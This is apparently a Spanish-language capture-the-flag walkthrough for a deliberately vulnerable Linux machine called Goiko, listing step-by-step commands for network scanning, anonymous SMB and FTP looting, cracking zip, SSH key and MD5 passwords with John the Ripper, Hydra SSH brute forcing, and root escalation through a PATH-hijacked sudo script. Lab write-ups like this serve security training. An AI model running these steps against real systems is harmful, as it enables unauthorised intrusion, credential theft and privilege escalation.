Máquina: Goiko
SO: Linux
Dificultad: Facil
Descarga


img

1. Escaneando la red para ver los hosts activos.

sudo arp-scan -I enp2s0 --localnet

img

2. Escaneo los puertos y servicios del host objetivo.

sudo nmap -p- --open -T5 --min-rate=5000 -sCV -n -Pn 192.168.1.9

img

3. Ya que no tenemos mas, y menos credenciales, listo los archivos compartidos.

smbclient -L //192.168.1.9/ -N

img

4. Veo los recursos en cada carpeta, en una de ellas encuentro credenciales.

smbclient //192.168.1.9/menu -N

get \.cafesinleche

cat ./\\.cafesinleche || cat ./.cafesinleche

img

5. Accedo por ssh pero no encuentro nada, mas que saber los usuarios de la maquina.

ssh marmai@192.168.1.9

cat /etc/passwd | grep bash

img

6. Accedo por ftp, donde encuentro un comprimo y me lo descargo.

ftp 192.168.1.9 -p 10021

dir

get BurgerWithoutCheese.zip

img

7. Necesito una clave para descomprimir, procedo a crackear la contraseña.

zip2john BurgerWithoutCheese.zip > keyzip

john --wordlist=/usr/share/wordlists/rockyou.txt keyzip

img

8. Descomprimo y me da una lista de usuarios y una idrsa cifrada.

unzip BurgerWithoutCheese.zip

cat users

cat id_rsa

img

9. Crackeando la contraseña del id_rsa.

ssh2john id_rsa > key

john --wordlist=/usr/share/wordlists/rockyou.txt key

img

10. Haciendo fuerza bruta al ssh.

hydra -L users -p "babygirl" ssh://192.168.1.9

img

11. Accedo por ssh como gurpreet y encuentro una nota.

ssh gurpreet@192.168.1.9

cat nota

img img

12. Accedo a la base de datos, encuentro credenciales.

mariadb -u gurpreet -p

show databases;

use secta;

show tables;

select * from integrantes;

img

13. Crackeando los hashes en md5.

nano hashes

john --wordlist=/usr/share/wordlists/rockyou.txt hashes --format=RAW-MD5

img

14. Migro al usuario nika, veo que puedo ejecutar un script bash como root.

su nika

sudo -l

img

15. Escalando privilegios a superusuario.

15.1- Veo que el script ejecuta el comando find pero sin especificar su ruta

cat /opt/porno/watchporn.sh

img

15.2- Voy a mi directorio de usuario y creo un find alternativo que ejecute una bash

cd

echo "/bin/bash" > find

chmod 777 find

img 15.3- Por ultimo ejecuto el script indicando nuestro PATH temporalmente, y obtenemos el usuario root

sudo PATH=/home/nika:$PATH /opt/porno/watchporno.sh

img


Finalizado.